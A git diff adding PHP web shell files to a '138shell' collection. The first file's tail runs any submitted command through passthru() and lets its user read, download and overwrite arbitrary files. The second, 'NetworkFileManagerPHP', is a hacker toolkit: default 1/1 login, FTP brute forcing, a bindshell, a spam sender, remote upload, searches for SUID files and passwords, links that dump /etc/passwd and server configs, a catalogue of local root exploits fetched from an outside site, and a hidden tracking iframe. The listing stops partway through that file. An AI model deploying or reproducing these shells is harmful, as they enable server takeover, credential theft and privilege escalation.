+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
+"zMshADs=");
+
+//This function sends the appropriate headers to handle the image (This is just GIF images easily modifiable
+if (isset($_GET['img']))
+{
+header("Content-type: image/gif");
+echo base64_decode($images[$_GET['img']]);
+die();
+}
+//Sets the directory to the directory specified
+if (isset($_GET['dir']))
+{
+	$current_dir = realpath($_GET['dir'])."/";
+}
+else
+{
+	$current_dir = './';
+}
+
+//Run a CLI command if one has been sent
+if (isset($_POST['CLICommand']))
+{
+	echo "<pre>";
+	echo "<b>Output From Command: </b><br />";
+	echo "<textarea cols='120' rows='25'>";
+	passthru($_POST['CLICommand']);
+	echo "</textarea>";
+	echo "</pre>";
+	die();
+}
+
+//set the current_dir url
+if (($current_dir == './') && (!isset($_COOKIE['dshell'])))
+{
+	$surl = $_SERVER['REQUEST_URI'];
+	setcookie('dshell',$surl,time()+99999);
+}
+elseif (!isset($_COOKIE['dshell']))
+	die('Error Could Not load the default path');
+else
+	$surl = $_COOKIE['dshell'];
+	
+function scan_dir($current_dir)
+{
+$chemin=$current_dir;
+if (glob("$chemin*"))
+{
+$files = glob("$chemin*");
+$fileListing = "";
+foreach ($files as $filename) {
+	  $fileListing .= "$filename-<";
+   }
+   $listing = explode('-<',$fileListing);
+   return $listing;
+ }
+ else
+ {
+	die("Couldn't Read directory, Blocked!!!");
+ }
+}
+
+//The majority of this function was taken off of php.net, no use reinventing the wheel when this works very well :p
+//Anyway this function gets the permssions in rwx form thats read write execute format.
+function perms_check($file)
+{
+	$perms = fileperms($file);
+
+if (($perms & 0xC000) == 0xC000) {
+    // Socket
+    $info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+    // Symbolic Link
+    $info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+    // Regular
+    $info = '-';
+} elseif (($perms & 0x6000) == 0x6000) {
+    // Block special
+    $info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+    // Directory
+    $info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+    // Character special
+    $info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+    // FIFO pipe
+    $info = 'p';
+} else {
+    // Unknown
+    $info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+            (($perms & 0x0800) ? 's' : 'x' ) :
+            (($perms & 0x0800) ? 'S' : '-'));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+            (($perms & 0x0400) ? 's' : 'x' ) :
+            (($perms & 0x0400) ? 'S' : '-'));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+            (($perms & 0x0200) ? 't' : 'x' ) :
+            (($perms & 0x0200) ? 'T' : '-'));
+
+	return $info;
+}
+
+
+//Function to display the files in the current_dir variable
+function dir_scan($current_dir) {
+$output="<tr><td><font color='red'>Filename</font></td><td><font color='red'>Permissions</font></td><td><font color='red'>Actions</font></td></tr>\n
+<tr><td><a href='?dir=".$current_dir."./'>.</a></td></tr>\n
+<tr><td><a href='?dir=".$current_dir."../'>..</a></td></tr>";
+$output_left="";
+foreach(scan_dir($current_dir) as $item) 
+{
+	if ($item == "." || $item == "..")
+	{
+		$item = str_replace($current_dir,"",$item);
+		$output .= "<tr><td width='90%'>".
+	"<a href='".$item."'>".$item."</a>".
+	"</td><td>".
+	"</td></tr>";
+	
+	}
+	else
+	{
+	if ($item == "")
+	{ }
+	else
+	{
+	if (is_dir($item))
+	{
+		$perms = perms_check($item);
+		$item = str_replace($current_dir,"",$item);
+		$output .="<tr><td width='90%'>"."<a href='?dir=".$current_dir.$item."/'>".$item."</a></td><td width='10%'>$perms</td><td>&nbsp&nbsp</td></tr>";
+	}
+	else
+	{
+	$perms = perms_check($item);
+	$item = str_replace($current_dir,"",$item);
+		$output_left .= "<tr><td width='90%'>".
+	"<a href='".$item."'>".$item."</a>".
+	"</td><td width='10%'>$perms</td><td>".
+	"<a href='?action=download&file=".$current_dir.$item."'><img src='".$surl."?img=download' border='0'></a><a href='".$surl."?action=edit&file=".$current_dir.$item."'><img src='".$surl."?img=edit' border='0'></a><br />".
+	"</td></tr>";
+	}
+	}
+	}
+}
+	$output .=$output_left;
+	return $output;
+}
+
+//Edit File Function, $mode can be r(read) w(write)
+//Content is needed only if writing
+function fedit($fileLocale,$mode,$content = "")
+{
+	if ($mode == "r")
+	{
+		$output = htmlspecialchars(file_get_contents($fileLocale));
+		return $output;
+	}
+	elseif ($mode == "w")
+	{
+		if ($content == "")
+			echo("Error No Content Provided!");
+		else {
+		$file = fopen($fileLocale,"w");
+		if (fwrite($file,stripslashes($content)))
+		{
+			$value = 1;
+		}
+		else 
+			$value = 0;
+		fclose($file);
+		return $value;
+		}
+	}
+}
+
+//Function for showing the edit page.
+function edit($file)
+{
+	return "<tr><td><center><form action='".$surl."?action=write&file=".$_GET['file']."' method='post'>
+	<textarea name='content' cols=100 rows=15>".fedit($file,'r')."</textarea><br /><input type='submit' value='Save'></center></form></td></tr>";
+}
+
+//Setup the Action
+if (!isset($_GET['action']))
+{
+	$action = dir_scan($current_dir);
+}
+elseif ($_GET['action'] == 'edit')
+{
+	$action = edit($_GET['file']);
+}
+elseif ($_GET['action'] == 'write')
+{
+	if (fedit($_GET['file'],'w',$_POST['content']))
+		$action = "<tr><td>Successful</td></tr>";
+	else
+		$action = "<tr><td>Error Writing File, Possible Permission Problem</td></tr>";
+}
+elseif ($_GET['action'] == 'download')
+{
+	$filename = $_GET['file'];
+	$filename = trim($filename); 
+	$file = $path.$filename; 
+	$file_size = filesize($file); 
+	if(strstr($HTTP_USER_AGENT, "MSIE 5.5")) { 
+	header("Content-Type: doesn/matter"); 
+	header("Content-Disposition: filename=$filename"); 
+	header("Content-Transfer-Encoding: binary"); 
+	header("Pragma: no-cache"); 
+	header("Expires: 0"); 
+	} 
+	else { 
+	Header("Content-type: file/unknown"); 
+	Header("Content-Disposition: attachment; filename=".str_replace("../","",$filename)); 
+	Header("Content-Description: PHP3 Generated Data"); 
+	header("Pragma: no-cache"); 
+	header("Expires: 0"); 
+	} 
+
+	if (is_file("$file")) { 
+	$fp = fopen("$file", "r"); 
+	if (!fpassthru($fp)) 
+	fclose($fp); 
+	} 
+	die();
+}
+
+//Actual Output
+echo "<html><body bgcolor='black' text='white'>\n";
+echo "<center>\n";
+echo "<table width='90%'>\n";
+echo "<tr><td colspan='2'><center><img src='".$surl."?img=banner'></center></td></tr>\n";
+echo "<tr><td colspan='2'><b>Operating System Information: </b>".php_uname()."</td></tr>\n";
+echo "<tr><td colspan='2'><b>Server Running As: </b>".get_current_user()."</td></tr>\n";
+echo "<tr><td colspan='2'><b>Current Directory: </b>".wordwrap(realpath($current_dir),100,'<br />')."</td></tr>\n";
+echo $action;
+echo "<tr><td colspan='2'>&nbsp</td></tr>";
+echo "<tr><td colspan='2'><b>Run Command: </b><form action='' method='post'><input type='text' name='CLICommand'><input type='submit' value='Run!'></form></td></tr>\n";
+echo "</table></center>\n";
+echo "</body></html>\n";
+
+?>
\ No newline at end of file
diff --git a/138shell/X/xinfo.php.txt b/138shell/X/xinfo.php.txt
new file mode 100644
index 0000000..46778ec
--- /dev/null
+++ b/138shell/X/xinfo.php.txt
@@ -0,0 +1,4820 @@
+<?
+
+if (ini_get('register_globals') != '1') {
+
+   if (!empty($HTTP_POST_VARS))
+
+    extract($HTTP_POST_VARS);
+
+
+
+  if (!empty($HTTP_GET_VARS))
+
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+
+    extract($HTTP_SERVER_VARS);
+
+}
+
+
+
+$use_md5=0; // Define use of MD5 crypt algoritm //
+
+$uname="1";
+
+$upass="1";
+
+
+
+
+
+
+if ($action != "download" && $action != "view" ):
+
+?>
+
+
+
+<?
+
+
+
+/* Define your email for file send function*/
+
+$demail ="arabnt@hotmail.com";
+
+
+
+/* config here */
+
+$title="NetworkFileManagerPHP for channel ";
+
+$ver="1.7.private ([final_english_release])";
+
+$sob="Belongs to <b><u>revers</u></b>";
+
+$id="1337";
+
+
+
+/* FTP-bruteforce */
+
+$filename="/etc/passwd";
+
+$ftp_server="localhost";
+
+/* İÇÍÕ ÇáÈæÑÊÇÊ */
+
+$min="1";
+
+$max="39333";
+
+
+
+/* Aliases */
+
+$aliases=array(
+
+/* find all SUID files */
+
+'find / -type f -perm -04000 -ls' => 'find all suid files'  ,
+
+/* find all SGID files */
+
+'find / -type f -perm -02000 -ls' => 'find all sgid files',
+
+/* find all config.inc.php files */
+
+'find / -type f -name config.inc.php' => 'find all config.inc.php files',
+
+/* find accesseable writeable directories and files*/
+
+'find / -perm -2 -ls' => 'find writeable directories and files',
+
+'ls -la' => 'Current directory listing with rights access',
+
+'find / -name *.php | xargs grep -li password' =>'searsh all file .php word password'
+
+
+
+);
+
+
+
+/* ÇáÈæÑÊ æÇáÇÓÊÎÏÇã */
+
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+
+$port[2] = "Management Utility";
+
+$port[3] = "Compression Process";
+
+$port[5] = "rje (Remote Job Entry)";
+
+$port[7] = "echo";
+
+$port[9] = "discard";
+
+$port[11] = "systat";
+
+$port[13] = "daytime";
+
+$port[15] = "netstat";
+
+$port[17] = "quote of the day";
+
+$port[18] = "send/rwp";
+
+/* finished config, here goes the design */
+
+$meta = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-1251\">";
+
+$style=<<<style
+
+<style>
+
+a.   {
+
+color: #ffffcc;
+
+text-decoration:none;
+
+font-family: Times New Roman;
+
+font-weight: bold;
+
+     }
+
+a.menu:hover   {
+
+color: #FF0000;
+
+font-family: Times New Roman;
+
+text-decoration: none
+
+font-weight: bold;
+
+          }
+
+a   {
+
+color: #000000;
+
+text-decoration:none;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+     }
+
+a:hover   {
+
+color: #184984;
+
+font-family: Tahoma;
+
+text-decoration: underline
+
+font-size: 11px;
+
+          }
+
+td.up{
+
+color: #996600;
+
+font-family: Verdana;
+
+font-weight: normal;
+
+font-size: 11px;
+
+}
+
+.pagetitle {
+
+font-family: Arial, Helvetica, sans-serif;
+
+color: #FFFFFF;
+
+text-decoration: none;
+
+font-size: 12px
+
+}
+
+.alert   {
+
+color: #FF0000;
+
+font-family: Tahoma;
+
+font-size: 11px;
+
+          }
+
+.button1 {
+
+font-size:11px;
+
+font-weight:bold;
+
+font-family:Verdana;
+
+background:#184984;
+
+border:1px solid #000000; cursor:hand; color:#ffffcc;
+
+}
+
+.inputbox {font-size:11px; font-family:Verdana, Arial, Helvetica, sans-serif; background:#EBEFF6; color:#213B72; border:1px solid #000000; font-weight:normal}
+
+.submit_button {  font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #FFFFFF; background-color: #999999;}
+
+.textbox { background: White; border: 1px #000000 solid; color: #000099; font-family: "Courier New", Courier, mono; font-size: 11px; scrollbar-face-color: #CCCCCC; scrollbar-shadow-color: #FFFFFF; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #FFFFFF; scrollbar-darkshadow-color: #FFFFFF; scrollbar-track-color: #FFFFFF; scrollbar-arrow-color: #000000 ; border-color: #000000 solid}
+
+b {  font-weight: bold}
+
+table {  font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #184984}
+
+</style>
+
+style;
+
+
+
+/* table styles */
+
+$style1=<<<table
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table;
+
+$style2=<<<table_file
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+table_file;
+
+$style3=<<<table_dir
+
+STYLE="background:#28BECA" onmouseover="this.style.backgroundColor = '#FFFFCC'" onmouseout="this.style.backgroundColor = '#28BECA'"
+
+table_dir;
+
+$style4=<<<table_files
+
+STYLE="background:#DCDCB0" onmouseover="this.style.backgroundColor = '#28BECA'" onmouseout="this.style.backgroundColor = '#DCDCB0'"
+
+table_files;
+
+$style_button=<<<button
+
+STYLE="background:#184984" onmouseover="this.style.backgroundColor = '#D5EBD7'" onmouseout="this.style.backgroundColor = '#184984'"
+
+button;
+
+$style_open=<<<open
+
+STYLE="background:#006200" onmouseover="this.style.backgroundColor = '#006200'" onmouseout="this.style.backgroundColor = '#006200'"
+
+open;
+
+$style_close=<<<close
+
+STYLE="background:#FF0000" onmouseover="this.style.backgroundColor = '#FF0000'" onmouseout="this.style.backgroundColor = '#FF0000'"
+
+close;
+
+$ins=<<<ins
+
+<script>
+
+function ins(text){
+
+document.hackru.chars_de.value+=text;
+
+document.hackru.chars_de.focus();
+
+}
+
+</script>
+
+ins;
+
+
+
+/* send form */
+
+$form = "
+
+<br>     <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white> <img src=http://leet.phpnet.us/sh.gif>
+
+   <tr>
+
+  <td align=center class=pagetitle colspan=2><b>Help for NetworkFileManagerPHP 1.7</b></font></b></td>
+
+  </tr>  <form method='POST' action='$PHP_SELF?action=feedback&status=ok'>
+
+     <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>Feedback:</b></td>
+
+  </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Your name:</b></td>
+
+      <td width='250' class=pagetitle>
+
+        <input type='text' name='name' size='40' class='inputbox'></td>
+
+      </tr>
+
+    <tr>
+
+      <td width='250' class=pagetitle><b>Email:</b></td>
+
+      <td width='250'><input type='text' name='email' size='40' class='inputbox'></td>
+
+    </tr>
+
+
+
+  <tr>
+
+  <td colspan=2 align=center class=pagetitle><b>
+
+  Your questions and wishes:
+
+  </b></font></b></td>
+
+  </tr>
+
+  <tr>
+
+      <td width=500 colspan=2><textarea rows='4' name='pole' cols='84' class='inputbox' ></textarea></td></tr>
+
+  <tr>
+
+  <td align=right><input type='submit' value='GO' name='B1' class=button1 $style_button></td>
+
+      <td align=left><input type='reset' value='Clear' name='B2' class=button1 $style_button></td>
+
+      </tr>
+
+</form></table><br>
+
+";
+
+
+
+
+
+
+
+/* HTML Form */
+
+$HTML=<<<html
+
+<html>
+
+<head>
+
+<title>$title $ver</title>
+
+$meta
+
+$style
+
+$ins
+
+</head>
+
+
+
+<body bgcolor=#E0F7FF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+
+<TABLE CELLPADDING=0 CELLSPACING=0 width='600' bgcolor=#184984 BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+
+<tr><td align=center colspan=6 class=pagetitle><b>NetworkFileManagerPHP (© #hack.ru)</b> Version: <b>$ver</b> </td></tr>
+
+<tr><td align=center colspan=6 class=pagetitle>Script for l33t admin job</td></tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Script help:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF'>.:Home</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href="http://hackru.info">.:#hack.ru</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href = '$PHP_SELF?action=feedback'>.:Feedback</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=help'>.:About</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=update'>.:Update</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Net tools:</b></td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=portscan'>.:Port scanner</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=ftp'>.:FTP bruteforce</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=tar'>.:Folder compression</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=sql'>.:Mysql Dump</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=bash'>.:bindshell (/bin/sh)</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' ><b>Exploits access:</b></td>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:bindshell</a>&nbsp;&nbsp;</td>
+
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Exploits</a>&nbsp;&nbsp;</td>
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>l33t tools:</b></td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Crypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Decrypter</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Spamer (!new!)</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Remote upload</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<tr>
+
+<td class=pagetitle align=center width='85%' colspan=6>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+
+</tr>
+
+<tr>
+
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+
+<td $style2 align=center width='15%' ><a class=menu href='http://goat.cx'>.:Bonus</td>
+
+
+
+</tr>
+
+<!-- add by revers -->
+
+<tr>
+
+<td class=pagetitle align=center width='85%'><b>Traffic tools:</b></td>
+<td $style2 align=center width='15%'><a class=menu href='$PHP_SELF?action=gettraff'>.:Get the script</a>&nbsp;&nbsp;</td>
+
+</tr>
+
+<!-- end add by revers -->
+
+</table>
+
+html;
+
+$key="goatse";
+
+$string="<IFRAME src=http://hackru.info/adm/count_nfm.php width=1 height=1 frameBorder=0 width=0 height=0></iframe>";
+
+/* randomizing letters array for random filenames of compression folders */
+
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+
+
+/* set full path to host and dir where public exploits and soft are situated */
+
+$public_site = "http://hackru.info/adm/exploits/public_exploits/";
+$public_sites = "http://drakdandy.net/had/";
+
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+
+/* Public exploits and soft */
+
+$public[1] = "s"; // bindshell
+
+$title_ex[1] = "
+
+&nbsp;&nbsp;bindtty.c - remote shell on 4000 port, with rights of current user (id of apache)<br>
+
+<dd><b>Run:</b> ./s<br>
+
+&nbsp;&nbsp;&nbsp;Connect tot host with your favorite telnet client. Best of them are <u><b>putty</b></u> and <u><b>SecureCRT</b></u>
+
+";
+
+$public[2] = "m"; // mremap
+
+$title_ex[2] = "
+
+&nbsp;&nbsp;MREMAP - allows to gain local root priveleges by exploiting the bug of memory .<br>
+
+<dd><b>Run:</b> ./m<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[3] = "p"; // ptrace
+
+$title_ex[3] = "
+
+&nbsp;&nbsp;PTRACE - good one, works like mremap, but for another bug<br>
+
+<dd><b>Run:</b> ./p<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$public[4] = "psyBNC2.tar.gz"; // psybnc
+
+$title_ex[4] = "
+
+&nbsp;&nbsp;psyBNC - Last release of favorite IRC bouncer<br>
+
+<dd><b>Decompression:</b> tar -zxf psyBNC2.tar.gz // will be folder <u>psybnc</u><br>
+
+<dd><b>Compilation, installing and running psybnc:</b> make // making psybnc // ./psybnc // You may edit psybnc.conf with NFM, Default listening port is 31337 - connect to it with your favotite IRC client and set a password<br>
+
+&nbsp;&nbsp;&nbsp;Allowed to run with uid of apache, but check out the firewall!
+
+";
+
+/* Private exploits */
+
+$private[1] = "brk"; // localroot root linux 2.4.*
+
+$title_exp[1] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - Exploit do_brk (code added) - gains local root priveleges if exploited succes<br>
+
+<dd><b>Run:</b> ./brk<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+
+$title_exp[2] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+<dd>There are 2 files: <b>dupescan</b> and <b>glftpd</b> To gain root uid, you need to write dupescan to <br>
+
+glftpd/bin/ with command <u>cp dupescan glftpd/bin/</u>, and after run <u>./glftpd</u>. Get the root!!!<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[3] = "glftpd";
+
+$title_exp[3] = "
+
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - private local root exploits for Glftpd daemon <br>
+
+part 2<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[4] = "sortrace";
+
+$title_exp[4] = "
+
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - private local root exploit for traceroute up to 1.4.a5<br>
+
+<dd><b>Run:</b> ./sortrace<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[5] = "root";
+
+$title_exp[5] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - ptrace private_mod exploits, may gain local root privaleges<br>
+
+<dd><b>Run:</b> ./root<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[6] = "sxp";
+
+$title_exp[6] = "
+
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - private local root exploit for Sendmail 8.11.x<br>
+
+<dd><b>Run:</b> ./sxp<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[7] = "ptrace_kmod";
+
+$title_exp[7] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - private local root exploit, uses kmod bug + ptrace , gives local root<br>
+
+<dd><b>Run:</b> ./ptrace_kmod<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+$private[8] = "mr1_a";
+
+$title_exp[8] = "
+
+&nbsp;&nbsp;localroot root linux 2.4.* - mremap any memory size local root exploit for kernels 2.4.x<br>
+
+<dd><b>Run:</b> ./mr1_a<br>
+
+&nbsp;&nbsp;&nbsp;Note: Run only from telnet session, not from web!!!
+
+";
+
+/* set full path to host and dir where private exploits and soft are situated */
+
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+
+endif;
+
+
+
+$createdir= "files";
+
+
+
+/* spamer config */
+
+
+
+$sendemail = "packetstorm@km.ru";
+
+$confirmationemail = "packetstorm@km.ru";
+
+$mailsubject = "Hello!This is a test message!";
+
+
+
+
+
+
+
+/* !!!Warning: DO NOT CHANGE ANYTHING IF YOU DUNNO WHAT ARE YOU DOING	 */
+
+global $action,$tm,$cm;
+
+
+
+function getdir() {
+
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+
+ $st = getcwd();
+
+ $st = str_replace("\\","/",$st);
+
+ $j = 0;
+
+ $gdir = array();
+
+ $gsub = array();
+
+ print("<br>");
+
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+
+  if ($st[$i] != "/") {
+
+   $gdir[$j] = $gdir[$j].$st[$i];
+
+   $gsub[$j] = $gsub[$j].$st[$i];
+
+  } else {
+
+   $gdir[$j] = $gdir[$j]."/";
+
+   $gsub[$j] = $gsub[$j]."/";
+
+   $gdir[$j+1] = $gdir[$j];
+
+   $j++;
+
+  }
+
+ }
+
+
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=60% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Current directory: </b>");
+
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+
+ $free = tinhbyte(diskfreespace("./"));
+
+ print("</td></tr><tr><td><b>&nbsp;&nbsp;Current disk free space</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; ".exec("cat /proc/cpuinfo | grep GHz")." &nbsp;&nbsp; &nbsp; &nbsp;Real speed of ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp; Perhaps release is :&nbsp;&nbsp;".exec("cat /etc/redhat-release")."</b></td></tr></td>");
+
+ print("<tr><td><b>&nbsp; ".exec("id")." &nbsp; &nbsp; &nbsp; &nbsp; ".exec("who")."</b></td></tr>");
+
+ print("<tr><td><b>&nbsp;&nbsp;Your IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr></table><br>");
+
+
+}
+
+function tinhbyte($filesize) {
+
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+
+ else { $filesize = $filesize . ""; }
+
+ return $filesize;
+
+}
+
+
+
+function permissions($mode) {
+
+ $perms  = ($mode & 00400) ? "r" : "-";
+
+ $perms .= ($mode & 00200) ? "w" : "-";
+
+ $perms .= ($mode & 00100) ? "x" : "-";
+
+ $perms .= ($mode & 00040) ? "r" : "-";
+
+ $perms .= ($mode & 00020) ? "w" : "-";
+
+ $perms .= ($mode & 00010) ? "x" : "-";
+
+ $perms .= ($mode & 00004) ? "r" : "-";
+
+ $perms .= ($mode & 00002) ? "w" : "-";
+
+ $perms .= ($mode & 00001) ? "x" : "-";
+
+ return $perms;
+
+}
+
+
+
+function readdirdata($dir) {
+
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+
+ $files = array();
+
+ $dirs= array();
+
+ $open = @opendir($dir);
+
+
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Access denied.</b></td></tr></table>";
+
+ else {
+
+  $open = opendir($dir);
+
+  while ($file = readdir($open)) {
+
+   $rec = $file;
+
+   $file = $dir."/".$file;
+
+   if (is_file($file)) $files[] = $rec;
+
+  }
+
+  sort($files);
+
+  $open = opendir($dir);
+
+  $i=0;
+
+  while ($dire = readdir($open)) {
+
+   if ( $dire != "." ) {
+
+    $rec = $dire;
+
+    $dire = $dir."/".$dire;
+
+    if (is_dir($dire)) {
+
+     $dirs[] = $rec;
+
+     $i++;
+
+    }
+
+   }
+
+  }
+
+  sort($dirs);
+
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Name</b></td><td width = '10%' align = 'center' class=pagetitle><b>Size</b></td><td width = '20%' align = 'center' class=pagetitle><b>Date of creation</b></td><td width = '10%' align = 'center' class=pagetitle><b>Type</b></td><td width = '15%' align = 'center' class=pagetitle><b>Access rights</b></td><td width = '25%' align = 'center' class=pagetitle><b>Comments</b></td></tr></table>");
+
+  for ($i=0;$i<sizeof($dirs);$i++) {
+
+   if ($dirs[$i] != "..") {
+
+    $type = 'Dir';
+
+    $fullpath = $dir."/".$dirs[$i];
+
+    $time = date("d/m/y H:i",filemtime($fullpath));
+
+    $perm = permissions(fileperms($fullpath));
+
+    $size = tinhbyte(filesize($fullpath));
+
+    $name = $dirs[$i];
+
+    $fullpath = $tm."/".$dirs[$i];
+
